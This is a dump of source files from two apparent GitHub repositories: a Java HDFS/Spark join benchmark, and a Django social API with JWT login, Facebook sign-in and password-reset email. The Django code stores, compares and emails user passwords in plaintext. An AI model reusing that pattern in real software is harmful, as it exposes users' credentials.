HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME());\n String dest = path + \"/data\";\n\n // delete _SUCCESS\n\n fs.delete(new Path(dest + \"/_SUCCESS\"), false);\n FileStatus[] fileStatus = fs.listStatus(new Path(dest));\n\n for (int i = 0; i < fileStatus.length; i++) {\n String oldPath = fileStatus[i].getPath().toString();\n String baseName = FilenameUtils.getBaseName(oldPath);\n String dir = oldPath.substring(0, oldPath.length() - baseName.length());\n String newPath = dir + Integer.parseInt(baseName.substring(baseName.indexOf('-') + 1));\n\n fs.rename(new Path(oldPath), new Path(newPath));\n }\n\n\n /* write out a fake (TOTAL_NUM_TUPLES is 0, delimiter is set to '|') info to make HDFSPartition Happy*/\n\n TableInfo tableInfo = new TableInfo(tableName, 0, ';', schema);\n tableInfo.save(cfg.getHDFS_WORKING_DIR(), cfg.getHDFS_REPLICATION_FACTOR(), fs);\n\n\n } catch (FileNotFoundException e) {\n e.printStackTrace();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n public Predicate getPredicate(Schema schema, String pred) {\n String[] parts = pred.split(\" \");\n int attrId = schema.getAttributeId(parts[0].trim());\n\n if (attrId == -1) {\n throw new RuntimeException(\"Unknown attr: \" + parts[0].trim());\n }\n\n TypeUtils.TYPE attrType = schema.getType(attrId);\n Object value = TypeUtils.deserializeValue(attrType, parts[2].trim().replaceAll(\"'\", \"\"));\n String predTypeStr = parts[1].trim();\n Predicate.PREDTYPE predType;\n switch (predTypeStr) {\n case \">\":\n predType = Predicate.PREDTYPE.GT;\n break;\n case \">=\":\n predType = Predicate.PREDTYPE.GEQ;\n break;\n case \"<\":\n predType = Predicate.PREDTYPE.LT;\n break;\n case \"<=\":\n predType = Predicate.PREDTYPE.LEQ;\n break;\n case \"=\":\n predType = Predicate.PREDTYPE.EQ;\n break;\n default:\n throw new RuntimeException(\"Unknown predType \" + predTypeStr);\n }\n\n Predicate p = new Predicate(attrId, attrType, value, predType);\n return p;\n }\n\n\n\n public ArrayList<ArrayList<JoinQuery>> generateWorkload() {\n byte[] stringBytes = HDFSUtils.readFile(\n HDFSUtils.getFSByHadoopHome(cfg.getHADOOP_HOME()),\n \"/user/yilu/cmt100000000/cmt_queries.log\");\n\n String queriesString = new String(stringBytes);\n String[] queries = queriesString.split(\"\\n\");\n ArrayList<ArrayList<JoinQuery>> ret = new ArrayList<ArrayList<JoinQuery>>();\n for (int i=0; i<queries.length; i++) {\n String query = queries[i];\n String[] predicates = query.split(\";\");\n ArrayList<Predicate> mhPreds = new ArrayList<Predicate>();\n ArrayList<Predicate> sfPreds = new ArrayList<Predicate>();\n\n ArrayList<JoinQuery> q = new ArrayList<JoinQuery>();\n\n for (int j=0; j<predicates.length; j++) {\n if(predicates[j].startsWith(MH)){\n Predicate p = getPredicate(schemaMH, predicates[j]);\n mhPreds.add(p);\n } else {\n Predicate p = getPredicate(schemaSF, predicates[j]);\n sfPreds.add(p);\n }\n }\n\n Predicate[] mhArray = mhPreds.toArray(new Predicate[mhPreds.size()]);\n Predicate[] sfArray = sfPreds.toArray(new Predicate[sfPreds.size()]);\n\n JoinQuery q_mh = new JoinQuery(MH, schemaMH.getAttributeId(\"mh_id\"), mhArray);\n JoinQuery q_sf = new JoinQuery(SF, schemaSF.getAttributeId(\"sf_id\"), sfArray);\n\n q.add(q_mh);\n q.add(q_sf);\n\n ret.add(q);\n }\n\n return ret;\n }\n\n\n // sf ⋈ (mhl ⋈ mh)\n public void runWorkload(){\n\n\n ArrayList<ArrayList<JoinQuery>> queries = generateWorkload();\n SparkJoinQuery sq = new SparkJoinQuery(cfg);\n int iters = 0;\n\n for (ArrayList<JoinQuery> q: queries) {\n\n JoinQuery q_mh = q.get(0);\n JoinQuery q_sf = q.get(1);\n JoinQuery q_mhl = new JoinQuery(MHL, schemaMHL.getAttributeId(\"mhl_mapmatch_history_id\"), EmptyPredicates);\n\n System.out.println(\"INFO: Query_MH:\" + q_mh.toString());\n System.out.println(\"INFO: Query_sf:\" + q_sf.toString());\n\n\n long start = System.currentTimeMillis();\n\n String stringMH_join_MHL = stringMH + \", \" + stringMHL;\n Schema schemaMH_join_MHL = Schema.createSchema(stringMH_join_MHL);\n\n JavaPairRDD<LongWritable, Text> mh_join_mhl_rdd = sq.createJoinRDD(MH, q_mh,MHL, q_mhl, schemaMH_join_MHL.getAttributeId(\"mhl_dataset_id\"));\n JavaPairRDD<LongWritable, Text> sf_rdd = sq.createScanRDD(SF, q_sf);\n JavaPairRDD<LongWritable, Tuple2<Text, Text>> rdd = mh_join_mhl_rdd.join(sf_rdd);\n long result = rdd.count();\n\n System.out.println(\"RES: Time Taken: \" + (System.currentTimeMillis() - start) + \"; Result: \" + result);\n }\n }\n\n public static void main(String[] args) {\n\n BenchmarkSettings.loadSettings(args);\n BenchmarkSettings.printSettings();\n\n CMTJoinWorkload t = new CMTJoinWorkload();\n t.loadSettings(args);\n t.setUp();\n\n switch (t.method) {\n case 1:\n t.runWorkload();\n break;\n default:\n break;\n }\n }\n}\n" }, { "alpha_fraction": 0.5413975119590759, "alphanum_fraction": 0.5537286996841431, "avg_line_length": 21.11688232421875, "blob_id": "1a24932ce3143161209533d9bb0be45cf4dc4ce3", "content_id": "6be6ed7784525752759d33a8686b52a11c328630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1703, "license_type": "no_license", "max_line_length": 55, "num_lines": 77, "path": "/src/test/java/core/util/ConcurrentAppendTest.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.util;\n\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.fs.FSDataOutputStream;\nimport org.apache.hadoop.fs.FileSystem;\nimport org.apache.hadoop.fs.Path;\n\nimport java.io.IOException;\nimport java.io.PrintWriter;\nimport java.net.URI;\n\n/**\n * Created by ylu on 3/8/16.\n */\n\nclass HelloThread extends Thread {\n\n String content;\n int id;\n HelloThread(String c, int i){\n content = c;\n id = i;\n }\n public void run() {\n String uri = \"hdfs://localhost:9000/test.txt\";\n\n // instantiate a configuration class\n Configuration conf = new Configuration();\n //conf.setBoolean(\"dfs.support.append\", true);\n // get a HDFS filesystem instance\n FileSystem fs = null;\n try {\n fs = FileSystem.get(URI.create(uri), conf);\n } catch (IOException e) {\n e.printStackTrace();\n }\n\n\n FSDataOutputStream fsout = null;\n try {\n fsout = fs.append(new Path(uri));\n for(int i = 0; i <1000; i ++){\n //System.out.println(id);\n fsout.writeChars(content);\n }\n\n // wrap the outputstream with a writer\n\n //fs.close();\n } catch (IOException e) {\n e.printStackTrace();\n }\n }\n\n\n}\n\npublic class ConcurrentAppendTest {\n\n\n public static void main(String[] args) {\n\n HelloThread t1 = new HelloThread(\"hello\\n\", 1);\n HelloThread t2 = new HelloThread(\"world\\n\", 2);\n t1.start();\n t2.start();\n\n try {\n t1.join();\n t2.join();\n } catch (InterruptedException e) {\n e.printStackTrace();\n }\n\n }\n\n}\n" }, { "alpha_fraction": 0.6774071455001831, "alphanum_fraction": 0.680060625076294, "avg_line_length": 27.989011764526367, "blob_id": "93e5dabef4b62231e0ea6e7f787612147dc619db", "content_id": "d07776281d8cafb68db98baf396da85e08bd74f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2638, "license_type": "no_license", "max_line_length": 101, "num_lines": 91, "path": "/src/main/java/core/adapt/spark/join/JoinAccessMethod.java", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "package core.adapt.spark.join;\n\nimport core.adapt.AccessMethod.PartitionSplit;\nimport core.adapt.JoinQuery;\nimport core.adapt.Predicate;\nimport core.adapt.iterator.PartitionIterator;\n\nimport core.adapt.opt.JoinOptimizer;\nimport core.common.globals.Globals;\nimport core.common.globals.TableInfo;\nimport core.common.index.JoinRobustTree;\nimport core.common.key.RawIndexKey;\nimport core.utils.HDFSUtils;\n\n/**\n * Created by ylu on 1/27/16.\n */\n\n/**\n * This access method class considers filter access method over the distributed\n * dataset. The filter could be extracted as: - the selection predicate in\n * selection query - the sub-range filter (different for each node) in\n * join/aggregate query\n *\n * Currently, we support filtering only on one attribute at a time, i.e. we\n * expect the query processor to filter on the most selective attribute.\n *\n * Filter query: - can access only the local blocks on each node - scan over\n * partitioned portion - crack over non-partitioned portion\n *\n */\n\npublic class JoinAccessMethod {\n public JoinOptimizer opt;\n public RawIndexKey key;\n\n /**\n * Initialize hyper-partitioning data access.\n */\n public void init(SparkJoinQueryConf conf, int partition) {\n JoinQuery query = conf.getQuery();\n\n Globals.loadTableInfo(query.getTable(), conf.getWorkingDir(),\n HDFSUtils.getFSByHadoopHome(conf.getHadoopHome()));\n\n TableInfo tableInfo = Globals.getTableInfo(query.getTable());\n key = new RawIndexKey(tableInfo.delimiter);\n opt = new JoinOptimizer(conf);\n\n opt.loadIndex(tableInfo, partition);\n opt.loadQueries(tableInfo);\n }\n\n public JoinRobustTree getIndex() {\n return opt.getIndex();\n }\n\n public RawIndexKey getKey() {\n return key;\n }\n\n /**\n * This method returns whether or not a given partition qualifies for the\n * predicate.\n *\n * @param predicate\n * @return\n */\n public boolean isRelevant(String partitionid, Predicate predicate) {\n return true;\n }\n\n /**\n * This method is used to: 1. lookup the partition index for relevant\n * partitions 2. and, to create splits of partitions which could be assigned\n * to different node.\n *\n * The split thus produced must be: (a) equal in size (b) contain blocks\n * from the same sub-tree\n *\n * @return\n */\n public PartitionSplit[] getPartitionSplits(JoinQuery q, boolean justAccess, int indexPartition) {\n if (justAccess) {\n return opt.buildAccessPlan(q);\n } else {\n return opt.buildPlan(q, indexPartition);\n }\n }\n\n}\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 38, "blob_id": "3a069e953096f4e3521e8f357ed4cf6fd10f8f41", "content_id": "d28624ef57b2f6ee3a5f5ca0e28c5fc0706df9b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 40, "license_type": "no_license", "max_line_length": 38, "num_lines": 1, "path": "/settings.gradle", "repo_name": "qinzhewudao/GraduationProject", "src_encoding": "UTF-8", "text": "rootProject.name = 'GraduationProject'\n\n" } ]
12
consokodev/socialapi
https://github.com/consokodev/socialapi
dc6afc0a55ab116407836dcad4c81e307c20a638
fabb763d534bf305a80597898b8ba163d75d6d10
656a3b0477f29f530b7c2510ba61f1f26a3203a0
refs/heads/master
2020-09-04T16:42:48.977837
2019-11-05T17:48:52
2019-11-05T17:48:52
218,351,162
0
0
null
2019-10-29T18:02:52
2019-10-29T18:03:34
2019-10-29T18:04:39
Python
[ { "alpha_fraction": 0.7208387851715088, "alphanum_fraction": 0.7208387851715088, "avg_line_length": 35.28571319580078, "blob_id": "9b96985fc67aaab5ebe87e45d272c5d72404a042", "content_id": "04218eee489ed4564865bfaca54979e14581387f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 785, "license_type": "no_license", "max_line_length": 69, "num_lines": 21, "path": "/api/tasks.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from celery.app import shared_task\nfrom celery.decorators import task\nfrom django.core.mail import EmailMultiAlternatives, send_mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom socialapi import celery_app\n\n@task(name=\"email_reset_pass\")\ndef email_reset_pass(email, reset_pass):\n html_content = render_to_string(\n 'mails/reset_pass.html',\n {'username': email, 'password': reset_pass}\n )\n text_content = strip_tags(html_content)\n subject = 'Восстановление аккаунта - plamber.com.ua'\n\n # send_mail(subject, \"message\", \"[email protected]\" ,[email])\n email = EmailMultiAlternatives(subject, text_content, to=[email])\n email.attach_alternative(html_content, 'text/html')\n email.send()\n\n" }, { "alpha_fraction": 0.40666666626930237, "alphanum_fraction": 0.6866666674613953, "avg_line_length": 17.75, "blob_id": "e608494191481e5999817797f51277b90d9b94d5", "content_id": "9c29a05282f084e28c38205911a9e4ec596d7986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 150, "license_type": "no_license", "max_line_length": 38, "num_lines": 8, "path": "/api/test.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "\n# time1 = \"2019-11-03 18:11:35.162187\"\n# time2 = \"2019-11-03 18:11:35.162187\n# \"\n\nfrom datetime import datetime\n\ndatetime.now()\nprint(datetime.now())" }, { "alpha_fraction": 0.530994176864624, "alphanum_fraction": 0.5836257338523865, "avg_line_length": 27.5, "blob_id": "fda3fd451305dc7bb8e1a996d8b87539b4c6774c", "content_id": "9d946e01b8b4fff76a239367c86d969d93b8fc1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 112, "num_lines": 30, "path": "/api/migrations/0002_auto_20191017_1726.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-17 17:26\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='fb_id',\n field=models.CharField(db_index=True, max_length=255, null=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 17, 17, 26, 28, 945035, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='email',\n field=models.EmailField(db_index=True, max_length=254, null=True, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5756056904792786, "alphanum_fraction": 0.5789473652839661, "avg_line_length": 35.846153259277344, "blob_id": "47a936092bf6c1630658dcf499764c98a59180e9", "content_id": "9ea514a743bde547e71395cf18dac7ff233ec3d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, "license_type": "no_license", "max_line_length": 115, "num_lines": 65, "path": "/my_utils/jwt_authen.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import datetime\nimport logging\nimport time\n\nimport jwt\nfrom django.http import JsonResponse\nfrom django.views import View\nfrom requests.api import request\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom my_utils import response_status, cus_exception\nfrom socialapi.settings import JWT_TOKEN_EXPIRATION_DAYS, SECRET_KEY\n\n\nclass JwtAuthen():\n @staticmethod\n def create_jwt(data):\n token = {\n 'iat': time.time(),\n 'nbf': time.time(),\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=JWT_TOKEN_EXPIRATION_DAYS),\n 'data': data\n }\n return jwt.encode(token, SECRET_KEY)\n \n @staticmethod\n def check_jwt(request):\n try:\n authen_token = request.headers['Authorization'].split()[1]\n token = jwt.decode(authen_token, SECRET_KEY, ['HS256'])\n if(token):\n cur_time = time.time()\n if(token['exp'] > cur_time):\n return token['data']\n except Exception as e:\n logging.exception(f'Token Error:')\n return None\n \n @staticmethod\n def check_jwt_detail(request):\n try:\n authen_token = request.headers['Authorization'].split()[1]\n token = jwt.decode(authen_token, SECRET_KEY, ['HS256'])\n if(token):\n cur_time = time.time()\n if(token['exp'] > cur_time):\n if(token['data'].get('email') and (token['data'].get('email') == request.data.get('email'))):\n return token['data']\n elif(token['data'].get('fb_id') and (token['data'].get('fb_id') == request.data.get('fb_id'))):\n return token['data']\n elif(token['data'].get('uid') and (token['data'].get('uid') == request.data.get('uid'))):\n return token['data']\n else:\n raise cus_exception.TokenInvalid()\n except Exception as e:\n logging.exception(f'Token Error:')\n raise cus_exception.TokenInvalid()\n\nclass CheckAuthen(BasePermission):\n\n def has_permission(self, request, view):\n return bool(JwtAuthen.check_jwt_detail(request))" }, { "alpha_fraction": 0.49529513716697693, "alphanum_fraction": 0.699743390083313, "avg_line_length": 15.942028999328613, "blob_id": "b955f4368639f730c698e5183be22f69d09cc1be", "content_id": "7dc3877855721407ad0f5f9b75cc6773fc0eea20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1169, "license_type": "no_license", "max_line_length": 37, "num_lines": 69, "path": "/requirements.txt", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "amqp==2.5.1\nasn1crypto==0.24.0\nbackports.ssl-match-hostname==3.5.0.1\nbcrypt==3.1.7\nbilliard==3.5.0.5\ncached-property==1.3.1\ncelery==4.0.2\ncertifi==2019.9.11\ncffi==1.13.0\nchardet==3.0.4\nClick==7.0\nconfigparser==4.0.2\ncontextlib2==0.6.0.post1\ncoverage==4.5.1\ncryptography==2.8\nDjango==1.10.4\ndjangorestframework==3.6.3\ndocker==2.5.1\ndocker-compose==1.17.1\ndocker-pycreds==0.2.1\ndockerpty==0.4.1\ndocopt==0.6.2\nenum34==1.1.6\nFlask==1.1.1\nfuncsigs==1.0.2\nfunctools32==3.2.3.post2\ngyp==0.1\nidna==2.5\nimportlib-metadata==0.23\nipaddress==1.0.17\nitsdangerous==1.1.0\nJinja2==2.10.3\njsonschema==2.6.0\nkeyring==10.6.0\nkeyrings.alt==3.0\nkombu==4.6.5\nMarkupSafe==1.1.1\nmock==2.0.0\nmore-itertools==5.0.0\nmysql-connector-python-rf==2.2.2\nolefile==0.46\nparamiko==2.6.0\npathlib2==2.3.5\npbr==3.1.1\nPillow==4.2.1\npsutil==5.4.2\npycairo==1.16.2\npycparser==2.19\npycrypto==2.6.1\npygobject==3.26.1\nPyNaCl==1.3.0\npyOpenSSL==17.5.0\nPyPDF2==1.26.0\npytz==2019.3\npyxdg==0.25\nPyYAML==3.12\nredis==3.2.1\nrequests==2.18.1\nscandir==1.10.0\nSecretStorage==2.3.1\nsix==1.12.0\nstormssh==0.7.0\ntermcolor==1.1.0\ntexttable==0.9.1\nurllib3==1.21.1\nvine==1.3.0\nwebsocket-client==0.44.0\nWerkzeug==0.16.0\nzipp==0.6.0\n" }, { "alpha_fraction": 0.7258444428443909, "alphanum_fraction": 0.754124104976654, "avg_line_length": 38.8125, "blob_id": "b59ff9575c2f51e423743cd370b7ff5068a50b4c", "content_id": "754156ae955f82e6d314bb759c999c567fc3861d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1333, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/my_utils/response_status.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom collections import namedtuple\n\nErrorCodeProperties = namedtuple(\"ErrorCodeProperties\", [\"code\", \"message\"])\n\nSUCCESS = ErrorCodeProperties(0, \"Thành Công\")\nFAIL = ErrorCodeProperties(-1, \"Thất Bại\")\n\nMODULE_NOT_ALLOW = ErrorCodeProperties(-8, \"Module không được phép sử dụng\")\n\nPERMISSION_DENY = ErrorCodeProperties(-9, \"Không Có Quyền\")\nUSER_BANNED = ErrorCodeProperties(-2, \"Tài Khoản Tạm Thời Bị Khóa\")\nUSER_LOGIN_FAILED = ErrorCodeProperties(-3, \"User Hoặc Password không đúng\")\nUSER_INACTIVATE = ErrorCodeProperties(-4, \"User Chưa Active\")\nUSER_INVALID_TOKEN = ErrorCodeProperties(-5, \"Token Không Hợp Lệ\")\nUSER_EXISTED = ErrorCodeProperties(-6, \"User Đã Tồn Tại\")\nUSER_NOT_EXISTED = ErrorCodeProperties(-7, \"User Không Tồn Tại\")\n\n\nERROR = ErrorCodeProperties(-10, \"Lỗi\")\nSERVER_ERROR = ErrorCodeProperties(-11, \"Server Lỗi\")\n\nEXCEPTION = ErrorCodeProperties(-100, \"Excection\")\n\nINVALID_DATA = ErrorCodeProperties(-110, \"Invalid Data\")\nINVALID_PARAM = ErrorCodeProperties(-111, \"Invalid Param\")\nINVALID_SIGNATURE = ErrorCodeProperties(-112, \"Invalid Signature\")\nINVALID_METHOD = ErrorCodeProperties(-200, \"Invalid Method\")\n\nNOT_FOUND = ErrorCodeProperties(-404, \"Không Tìm Thấy\")\nBAD_REQUEST = ErrorCodeProperties(-400, \"Request Ngu\")" }, { "alpha_fraction": 0.6715379357337952, "alphanum_fraction": 0.6729297041893005, "avg_line_length": 35.871795654296875, "blob_id": "c1d9dd2d63aa6ef829199f0a30c0bd5df9fdeb27", "content_id": "3a8045b33c3abb944d2fd08fa914786a87557abe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1437, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": "/serverapi/views/users.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "from datetime import datetime\n\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\nfrom api.models import User\nfrom my_utils.check_fields import check_required_fields\nfrom my_utils.jwt_authen import CheckAuthen\nfrom my_utils import response_status\nfrom my_utils.response_utils import response_fail\nfrom scmodels.serializers.user_serializers import GetUserProfileSerializer\n\n# Create your views here.\n\nclass ListUser(APIView):\n permission_classes = [CheckAuthen]\n\n def get(self, request, *args, **kwargs):\n required_fields = [\"last_uid\", \"limit\", \"uid\"]\n check_required_fields(required_fields, self.kwargs)\n\n limit = self.kwargs.get(\"limit\")\n last_uid = 0 if self.kwargs.get(\"last_uid\") == \"0\" else self.kwargs.get(\"last_uid\")\n check_point = datetime.now()\n if(last_uid):\n try:\n user = User.objects.get(uid=last_uid)\n check_point = user.created_at\n except Exception as e:\n return response_fail()\n \n query_ret = User.objects.collect_list_users(check_point, limit)\n responseData = GetUserProfileSerializer(query_ret, many=True).data\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"responseData\": responseData,\n })" }, { "alpha_fraction": 0.5163934230804443, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 24.41666603088379, "blob_id": "c15d9a2527e572c59d12737a2c74bec953f40135", "content_id": "0ac3e94542678ff0a6a57a3c46ac4390e07e178f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 610, "license_type": "no_license", "max_line_length": 112, "num_lines": 24, "path": "/api/migrations/0013_auto_20191026_1052.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 10:52\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0012_auto_20191026_1052'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='ForgetPass',\n new_name='UserOTP',\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 10, 52, 43, 846655, tzinfo=utc)),\n ),\n ]\n" }, { "alpha_fraction": 0.5512367486953735, "alphanum_fraction": 0.6007066965103149, "avg_line_length": 31.342857360839844, "blob_id": "a63945e8215392493ff1c8c8d74b091deea521ec", "content_id": "b65ed0806387fc72bc938d1044587aa18c63d8db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1132, "license_type": "no_license", "max_line_length": 155, "num_lines": 35, "path": "/api/migrations/0012_auto_20191026_1052.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "# Generated by Django 2.2.6 on 2019-10-26 10:52\n\nimport datetime\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('api', '0011_auto_20191025_1037'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ForgetPass',\n fields=[\n ('uid', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),\n ('email', models.EmailField(max_length=254, unique=True)),\n ('otp_code_reset_pass', models.CharField(max_length=10)),\n ],\n ),\n migrations.AlterField(\n model_name='user',\n name='created_at',\n field=models.DateTimeField(default=datetime.datetime(2019, 10, 26, 10, 52, 8, 45934, tzinfo=utc)),\n ),\n migrations.AlterField(\n model_name='user',\n name='password',\n field=models.CharField(max_length=20),\n ),\n ]\n" }, { "alpha_fraction": 0.5873563289642334, "alphanum_fraction": 0.5879310369491577, "avg_line_length": 40.82692337036133, "blob_id": "4b89e487b6580fadc496e542e15480fa992c517c", "content_id": "60cc3c8ba444d2e7c785ba3cb1cc924255e12a55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8700, "license_type": "no_license", "max_line_length": 134, "num_lines": 208, "path": "/api/views.py", "repo_name": "consokodev/socialapi", "src_encoding": "UTF-8", "text": "import json\nimport random\nimport string\nfrom pprint import pprint\n\nimport facebook\nimport jwt\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status\nfrom rest_framework.exceptions import APIException\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom api.models import User, UserOTP\nfrom scmodels.serializers.user_serializers import (GetUserProfileSerializer,\n UpdateUserProfileSerializer,\n UserResetPassSerializer, UserSerializer\n )\nfrom my_utils.check_fields import check_required_fields\nfrom my_utils import response_status\nfrom my_utils.jwt_authen import CheckAuthen, JwtAuthen\nfrom my_utils.log_module import logger_socialapi\nfrom my_utils.response_utils import response_fail, response_success\nfrom socialapi.settings import SECRET_KEY\nfrom api.tasks import email_reset_pass\n\n\nclass CreateUser(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\", \"password\"]\n check_required_fields(required_fields, request.data)\n \n user_serializer = UserSerializer(data=request.data)\n\n if(user_serializer.is_valid()):\n try:\n email = user_serializer.validated_data.get(\"email\")\n User.objects.get(email=email)\n return Response({\n 'ResponseCode': response_status.USER_EXISTED.code,\n 'ResponseMessage': response_status.USER_EXISTED.message\n })\n except ObjectDoesNotExist as e:\n user = user_serializer.save()\n logger_socialapi.info(f'SUCCESS: Created User {user.email}')\n responseData = dict(GetUserProfileSerializer(user).data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Failed')\n return response_fail()\n elif(user_serializer.errors):\n return Response({\n 'ResponseCode': response_status.FAIL.code,\n 'ResponseMessage': user_serializer.errors\n })\n\n\nclass LoginUserFace(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"fb_id\", \"access_token\"]\n check_required_fields(required_fields, request.data)\n \n try:\n fb_id = request.data.get('fb_id')\n access_token = request.data.get('access_token')\n profile = facebook.GraphAPI(access_token=access_token).get_object('me', fields='email,name,gender,birthday')\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Facebook Failed')\n return response_fail()\n if(fb_id == profile.get('id')):\n fb_id, email, name = profile.get('id'), profile.get('email'), profile.get('name')\n try:\n user = User.objects.get(fb_id=fb_id)\n if(hasattr(user, 'is_banned') and user.is_banned == 1):\n return Response({\n \"responseCode\": response_status.USER_BANNED.code,\n \"responseMessage\": response_status.USER_BANNED.message \n })\n # elif(hasattr(user, 'is_activated') and user.is_activated == 0):\n # return Response({\n # \"responseCode\": response_status.USER_INACTIVATE.code,\n # \"responseMessage\": response_status.USER_INACTIVATE.message \n # })\n responseData = dict(GetUserProfileSerializer(user).data)\n except ObjectDoesNotExist as e:\n logger_socialapi.info(f'Register user {fb_id}')\n user = User.objects.create(fb_id=fb_id, email=email, fullname=name)\n responseData = dict(GetUserProfileSerializer(user).data)\n except Exception as e:\n logger_socialapi.exception(f'Error: Register Failed {fb_id}')\n return response_fail()\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n else:\n logger_socialapi.exception(f'Error: Register Failed {fb_id}')\n return response_fail()\n\n\n# User login if sucess, then return jwt vs user data\nclass LoginUser(APIView):\n\n def post(self, request, *args, **kwargs):\n required_fields = [\"email\", \"password\"]\n check_required_fields(required_fields, request.data)\n \n try:\n email = request.data.get('email')\n password = request.data.get('password')\n user = User.objects.get(email=email, password=password)\n if(hasattr(user, 'is_banned') and user.is_banned == 1):\n return Response({\n \"responseCode\": response_status.USER_BANNED.code,\n \"responseMessage\": response_status.USER_BANNED.message \n })\n # elif(hasattr(user, 'is_activated') and user.is_activated == 0):\n # return Response({\n # \"responseCode\": response_status.USER_INACTIVATE.code,\n # \"responseMessage\": response_status.USER_INACTIVATE.message \n # })\n else:\n responseData = dict(GetUserProfileSerializer(user).data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"token\": JwtAuthen.create_jwt(responseData),\n \"responseData\": responseData,\n })\n except ObjectDoesNotExist as e:\n return Response(\n {\n \"responseCode\": response_status.USER_LOGIN_FAILED.code,\n \"responseMessage\": response_status.USER_LOGIN_FAILED.message,\n }\n )\n\n\nclass UpdateUser(APIView):\n permission_classes = [CheckAuthen]\n\n def put(self, request, *args, **kwargs):\n required_fields = [\"uid\", \"fullname\", \"gender\", \"birthday\"]\n check_required_fields(required_fields, request.data)\n\n uid = request.data.get(\"uid\")\n try:\n user = User.objects.get(uid=uid)\n user_serializer = UpdateUserProfileSerializer(user, data=request.data)\n user_serializer.is_valid(raise_exception=True)\n user_serializer.save()\n responseData = dict(user_serializer.data)\n return Response({\n \"responseCode\": response_status.SUCCESS.code,\n \"responseMessage\": response_status.SUCCESS.message,\n \"responseData\": responseData,\n })\n except ObjectDoesNotExist as e:\n return Response({\n \"ResponseCode\": response_status.USER_NOT_EXISTED.code,\n \"ResponseMessage\": response_status.USER_NOT_EXISTED.message\n 